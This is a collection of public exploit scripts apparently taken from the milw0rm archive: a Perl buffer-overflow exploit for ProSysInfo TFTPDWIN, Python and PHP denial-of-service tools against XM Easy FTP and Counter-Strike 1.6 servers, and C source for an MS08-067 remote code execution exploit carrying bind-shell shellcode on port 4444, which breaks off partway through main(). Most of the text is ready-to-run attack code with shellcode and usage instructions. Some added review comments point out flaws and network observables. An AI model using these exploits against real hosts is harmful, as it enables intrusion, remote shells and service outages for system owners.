use IO::Socket;
use warnings;
use strict;
# Usage guard: exactly one positional argument (the target IP) is required.
if(!($ARGV[0]))
{
    print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2\n";
    print " Universal Remote Buffer Overflow Exploit\n\n";
    print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
    print "[x] Usage: prosystftpd_exploit.pl <target IP>\n\n";
    exit(0);
}
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
# Opaque encoded payload blob; per the generator note above it launches calc.
my $shellcode =
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\x8b\x4e\x52\x8a".
"\x24\x43\xf2\x67\xf0\x53\xb8\x07\x24\x53\x32\xed\x44\xc6\xe5\xc8".
"\xab\x8c\x88\x2c\xcb\xc4\xf9\xdc\x2a\x8f\xc1\xe0\x24\x0f\xb5\x67".
"\xdf\x53\x14\x67\xc7\x47\x52\xe5\x24\xcf\x09\xec\xaf\x4f\x32\x84".
"\x93\x10\x88\x1a\xcf\x19\x30\x14\x2c\x8f\xc2\xbc\xc7\xbf\x33\xe8".
"\xf0\x27\x21\x12\x25\x41\xee\x13\x48\x2c\xd8\x80\xcc\x4f\xb9\xec";
# TFTP read-request opcode (1, RFC 1350).
my $p1="\x00\x01";
# Filename terminator, then the mode field "netascii" and its terminator, kept
# as raw bytes (0x6e 0x65 0x74 are the 'n','e','t' listed as restricted above).
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
my $ret = "\x5d\x10\x40"; #0040105D -> :) SkD's Tricks
my $nopsled = "\x90" x 10;
# Payload region is padded with 0x41 to a fixed 274 bytes; a larger blob is
# rejected outright.
my $len = (274 - length($shellcode));
if($len < 0) {
    print "[x] Your shellcode is too big! Find another way :)\n";
    exit(0);
}
my $overflow = "\x41" x $len;
# Whole datagram: opcode, NOP run, payload, padding, 3 address bytes, mode
# tail. The filename field ends up roughly 290 bytes long -- far beyond any
# real path -- which is the observable on UDP/69.
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));
# For UDP this only records the peer address; nothing is exchanged yet, so the
# "Connected" message below does not mean the daemon answered.
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
die "[x] Cannot Connect!\n" unless $sock;
print "[x] Connected to daemon :)\n";
print "[x] Sending packet..\n";
print $sock $packet;
sleep(1);
close $sock;
# Unconditional: nothing is ever read back, so success is not verified.
print "[x] Target owned!\n";
exit(0);
# milw0rm.com [2008-12-14]
Houssam Sahli/XM Easy Personal FTP Server 5.8.0 (TYPE) Denial Of Service ( windows)
#!/usr/bin/python
#
# Exploit Title : XM Easy Personal FTP Server 5.8.0 Denial Of Service LIST command
# Date: 10/02/2011
# Author: Houssam Sahli
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3 French
#!/usr/bin/python
# ASCII-art banner and a one-line note, printed before the imports that follow.
print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"
print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call TYPE command.\n"
import socket
import sys
def Usage():
    """Write the command-line synopsis, followed by a blank line, to stdout."""
    sys.stdout.write("Usage: ./expl.py <host> <Username> <password>\n\n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
    """Connect to FTP on port 21 (hard-coded), log in with the given
    credentials, send one TYPE command carrying the ~19 KB module-level
    `buffer`, and close without reading the reply.

    Exits the process with status 1 if the TCP connection fails. Returns
    nothing. As with any plain FTP login, the credentials cross the wire in
    clear text.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        # Bare except: also swallows KeyboardInterrupt.
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    # The login reply is read but never checked; TYPE is sent regardless.
    r=sock.recv(1024)
    print "[+] Send malicious string"
    # A TYPE command with a multi-kilobyte argument (instead of "A"/"I") is the
    # observable in FTP server logs and on the wire.
    sock.send("TYPE %s\r\n" %buffer)
    sock.close()
# Argument check: exactly three positionals (host, user name, password).
# `<>` is the Python 2-only spelling of `!=`.
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    start(hostname,username,passwd)
    sys.exit(0)
Eugene Minaev/Half-Life CSTRIKE Server 1.6 Denial of Service Exploit (no-steam) ( multiple)
----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]
Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
<html>
<head>
<title>Counter Strike DOS POC (underwater@itdefence.ru) </title>
<style type="text/css">
input {
width: 150px;
}
td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}
span.err {
color: red;
}
span.ok {
color: green;
}
</style>
</head>
<body onload="checkpass()">
<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">
<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>
<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>
<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>
<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>
<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>
</table>
<br/>
</form>
</div>
<center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br></center>
</body>
</html>
<?php
/*
CS-dos exploit made by underwater
Bug was discovered by .FUF
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG]http://www.softoplanet.ru/style_emoticons/default/biggrin.gif[/IMG] ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
*/
ini_set("display_errors","0");
# Builds the server-info query: 0xFFFFFFFF header, the literal
# "TSource Engine Query" (the standard Source-engine A2S_INFO request), NUL.
function HELLO_PACKET()
{
    $header = "\xFF\xFF\xFF\xFF";
    return $header . "TSource Engine Query" . "\x00";
}
# Builds the challenge request: 0xFFFFFFFF header, "getchallenge valve", NUL.
# The server's answer is what dowork() mines for the $cookie token.
function CHALLENGE_PACKET()
{
    $header = "\xFF\xFF\xFF\xFF";
    return $header . "getchallenge valve" . "\x00";
}
# Builds the "connect" packet used when the "Auth Type 2" box is NOT ticked
# (dowork() picks this one for $auth == false). Reads the challenge token
# ($cookie, set by dowork) and the form password ($password) from globals.
# The client-info block is a fixed string with a hard-coded cdkey hash; the
# password is appended verbatim and a few fixed trailer bytes close the packet.
function LOGIN_PACKET_4()
{
    global $cookie;
    global $password;
    $packet = pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    # Single-quoted: the backslashes below are literal, not escapes.
    $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
    $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
    $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","220A0000EE02");
    return $packet;
}
# Builds the "connect" packet used when the "Auth Type 2" box IS ticked
# (dowork() picks this one for $auth == true). Same shape as LOGIN_PACKET_4
# but with a shorter protocol block and a one-byte trailer. Reads $cookie and
# $password from globals; the password is appended verbatim.
function LOGIN_PACKET_2()
{
    global $cookie;
    global $password;
    $packet = pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    # Single-quoted: the backslashes below are literal, not escapes.
    $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
    $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
    $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","22");
    return $packet;
}
# Runs one query / challenge / connect exchange with the game server over UDP.
#   $host, $port - destination; the port is cast to int, the host is used as given
#   $password    - effectively unused as a parameter: the `global $password`
#                  below rebinds the name to the global, which the caller sets
#                  to the same value, so the result is the same but confusing
#   $auth        - true selects LOGIN_PACKET_2, false selects LOGIN_PACKET_4
# Stores the challenge token in the global $cookie for the LOGIN_PACKET_*
# helpers. Returns nothing; dies with the socket error string if the socket
# cannot be opened.
function dowork($host,$port,$password,$auth)
{
    global $password;
    global $cookie;
    # connecting to target host
    # 2-second timeout; $errnum is populated but never used.
    $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
    if (!$fsock) die ($errstr);
    else
    {
        # sending hello packet
        fwrite ($fsock,HELLO_PACKET());
        fread ($fsock,100);
        # sending challenge packet
        fwrite ($fsock,CHALLENGE_PACKET());
        # receiving cookies
        $resp = fread($fsock,100);
        # grab cookies from packet
        # NOTE(review): no check that the marker exists -- strpos() returning
        # false turns this into substr($resp, 10).
        $cookie = substr($resp,strpos($resp,"A00000000")+10);
        $cookie = substr($cookie,0,strpos($cookie," "));
        # sending login packet
        if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
        # The reply is read and discarded.
        $resp = fread($fsock,100);
    }
}
# POST handler: any request carrying host and port runs the exchange twice.
# There is no authentication or origin check and the destination comes straight
# from the form, so anyone who can reach this page can make the web host send
# these packets to an arbitrary host and port -- if this script is ever found
# deployed, treat it as an open UDP relay.
IF (isset($_POST['host']) && isset($_POST['port']))
{
    # Password defaults to "123" when the field is left blank.
    IF (empty($_POST['pass'])) $password = "123";
    else $password = $_POST['pass'];
    $fserver = $_POST['host'];
    $fport = $_POST['port'];
    if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
    # we have to connect 2 times
    # dowork() returns nothing, so $result is always NULL.
    $result = dowork($fserver,$fport,$password,$fauth);
    $result = dowork($fserver,$fport,$password,$fauth);
    # parsing result
    # Nothing is actually parsed; the message is printed unconditionally.
    echo "Exploit Sent";
}
?>
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# milw0rm.com [2008-01-06]
Polymorphours/MS Windows Server Service Code Execution Exploit (MS08-067) ( windows)
/*
MS08-067 Remote Stack Overflow Vulnerability Exploit
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28
*/
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
// In-memory view of a DCE/RPC bind PDU (common header + one context item) as
// this program builds it.
// NOTE(review): BindRpcInterface() fills it with memcpy from the 0x48-byte
// PRPC template, so it relies on the compiler's default member alignment
// placing every field at its wire offset (e.g. the padding after NumCtxItems)
// and on sizeof(struct RPCBIND) == 0x48; a larger struct would over-read
// PRPC -- TODO confirm under the build settings used.
struct RPCBIND
{
    BYTE VerMaj;            // RPC version, major
    BYTE VerMin;            // RPC version, minor
    BYTE PacketType;        // PDU type
    BYTE PacketFlags;
    DWORD DataRep;          // data representation label
    WORD FragLength;        // total PDU length
    WORD AuthLength;
    DWORD CallID;
    WORD MaxXmitFrag;
    WORD MaxRecvFrag;
    DWORD AssocGroup;
    BYTE NumCtxItems;       // followed by alignment padding in memory
    WORD ContextID;
    WORD NumTransItems;
    GUID InterfaceUUID;     // overwritten by BindRpcInterface from its Interface argument
    WORD InterfaceVerMaj;   // overwritten from InterfaceVer[0]
    WORD InterfaceVerMin;   // overwritten from InterfaceVer[2]
    GUID TransferSyntax;
    DWORD SyntaxVer;
};
// Header of a DCE/RPC request PDU. Not referenced by any visible code: the
// POP and EXPLOIT buffers carry the equivalent header as raw bytes instead
// (see the comment on POP).
struct RPCFUNC
{
    BYTE VerMaj;
    BYTE VerMin;
    BYTE PacketType;
    BYTE PacketFlags;
    DWORD DataRep;
    WORD FragLength;
    WORD AuthLength;
    DWORD CallID;
    DWORD AllocHint;
    WORD ContextID;
    WORD Opnum;
};
// 0x48-byte raw template of a bind PDU. BindRpcInterface() copies it whole
// into a struct RPCBIND and then patches in the interface UUID and version
// (the bytes at those positions here are placeholders).
BYTE PRPC[0x48] = {
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
    0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
    0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
    0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
// Raw request PDU (header bytes followed by the stub), sent as the last
// transaction in main(). Defined as a string literal, so sizeof() includes a
// trailing NUL that main() subtracts when sending. The stub carries a short
// UTF-16LE path ("\A\..\..\") followed by filler and one hard-coded address.
BYTE EXPLOIT[] =
    "\x05\x00"
    "\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
    "\x00\x00\x00\x00\x1f\x00"
    "\x00\x00\x00\x00"
    "\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
    "\x5c\x00"
    "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"   // UTF-16LE "A\..\..\"
    "\x41\x41"
    "\x41\x41\x41\x41"
    "\x41\x41\x41\x41"
    "\x41\x41\x41\x41"
    "\x41\x41\x41\x41"
    "\x12\x45\xfa\x7f" // jmp esp
    "\x90\x8B\xF4\x81"
    "\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
    "\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
    // "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
    "\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"
    "\x00\x00\x00\x00\x01\x00"
    "\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
    "\x00\x00"
    "\x01\x00\x00\x00\x01\x00\x00\x00";
// Raw request PDU (header bytes followed by a large stub), sent as the first
// transaction in main(). Before sending, main() overwrites this buffer at
// byte offset 74 with bind_shellcode, so the NOP/0x41 runs below are partly a
// placeholder region. String literal: sizeof() includes a trailing NUL that
// main() subtracts. The 0xCC near the end is a breakpoint byte left in place.
BYTE POP[] =//stub header RPCFUNC structure
    "\x05\x00"
    "\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
    "\x00\x00\x00\x00\x1f\x00"
    "\x00\x00\x00\x00"
    "\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"
    "\x5c\x00"
    "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"
    "\x00\x00\x00\x00\x01\x00"
    "\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
    "\x00\x00"
    "\x01\x00\x00\x00\x01\x00\x00\x00";
// Opaque payload blob. The usage banner in main() describes it as a bind
// shell on port 4444; main() copies sizeof(bind_shellcode)-1 bytes of it
// (dropping the literal's NUL) into POP at offset 74. The two commented-out
// leading fragments below were left by the author.
unsigned char bind_shellcode[] =
    // "\xCC"
    // "\x83\xEC\x40" // sub esp, 0x70
    "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
    "\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
    "\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
    "\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
    "\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
    "\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
    "\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
    "\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
    "\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
    "\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
    "\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
    "\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
    "\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
    "\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
    "\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
    "\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
    "\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
    "\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
    "\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
    "\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
    "\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
    "\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";
// Sends a bind request for one interface over an already-open named pipe.
//   PH           - pipe handle opened by the caller
//   Interface    - interface UUID in string form
//   InterfaceVer - version as "M.m"; the characters at index 0 and 2 are read
//                  with atoi(), which only yields the minor digit correctly
//                  when the major version is a single digit
// Always returns 0: the TransactNamedPipe result is not checked and the reply
// left in rbuf is discarded.
int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
    BYTE rbuf[0x1000]="";
    DWORD dw=0;
    struct RPCBIND RPCBind;
    // Start from the raw PRPC template; only the UUID and version are patched.
    memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
    UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
    // NOTE(review): converts the UUID back to text into the *local* pointer
    // only; the string it allocates is never released with RpcStringFree and
    // the value is never used, so this call has no effect beyond a small leak.
    UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
    RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
    RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
    TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);
    return 0;
}
// Entry point. Usage: <prog> [IP].
// Sequence: WSAStartup; patch bind_shellcode into POP at offset 74; map
// \\IP\pipe with an empty password and user name (an anonymous IPC$ session);
// open \\IP\pipe\browser; bind the 4b324fc8-... interface (the Server service
// the page title refers to); send POP and then EXPLOIT as two raw
// transactions. Returns 0 on every path, including failures.
// NOTE(review): WSAStartup has no matching WSACleanup, the WNet connection is
// never removed (WNetCancelConnection2), and neither TransactNamedPipe result
// is checked. From the target's side the observable is an anonymous IPC$
// session followed by that bind over \pipe\browser.
int main(int argc, char* argv[])
{
    char *server;
    NETRESOURCE nr;
    char unc[MAX_PATH];
    char szPipe[MAX_PATH];
    HANDLE hFile;
    WSADATA wsa;
    int bwritten=0;          // unused
    BYTE rbuf[0x100]="";     // replies land here and are never inspected
    DWORD dw;
    PVOID ptr = (PVOID)&POP;
    // Banner and usage are printed before the argument count is checked.
    printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
    printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
    printf( "Thanks isno and PolyMeta\n" );
    printf( "ShellCode Function: bindshell port:4444\n" );
    printf( "usage:\n%s [IP]\n", argv[0] );
    if ( argc != 2 ) {
        return 0;
    }
    if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {
        printf( "WSAStartup failed\n" );
        return 0;
    }
    // Overwrite part of the POP template with the payload (sizeof-1 drops the
    // literal's trailing NUL). By my count the write stays inside POP -- confirm.
    memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);
    server=argv[1];
    _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
    unc[sizeof(unc)-1] = 0;  // _snprintf may leave the buffer unterminated
    nr.dwType = RESOURCETYPE_ANY;
    nr.lpLocalName = NULL;
    nr.lpRemoteName = unc;
    nr.lpProvider = NULL;
    printf( "connect %s ipc$ .... ", server );
    // Empty password and empty user name.
    if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {
        printf( "failed\n" );
        return 0;
    } else {
        printf( "success!\n" );
    }
    // Unlike unc above, szPipe is not explicitly NUL-terminated afterwards.
    _snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
    printf( "open \\\\%s\\pipe\\browser ....", server );
    hFile = CreateFile( szPipe,
        GENERIC_READ|GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING, 0, NULL);
    if ( hFile == (HANDLE)-1 ) {   // (HANDLE)-1 is INVALID_HANDLE_VALUE
        printf( "failed!\n" );
        return 0;
    } else {
        printf( "success!\n" );
    }
